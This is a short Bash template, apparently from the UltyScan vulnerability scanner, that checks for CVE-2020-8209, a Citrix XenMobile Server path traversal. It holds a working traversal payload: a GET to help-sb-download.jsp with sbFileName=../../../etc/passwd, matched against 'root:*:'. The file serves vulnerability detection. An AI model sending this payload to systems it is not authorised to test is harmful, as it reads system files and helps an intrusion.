Files
UltyScan/templates/active/CVE-2020-8209_-_Citrix_XenMobile_Server_Path_Traversal.sh

9 lines
283 B
Bash

AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - Citrix XenMobile Server Path Traversal'
URI="/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'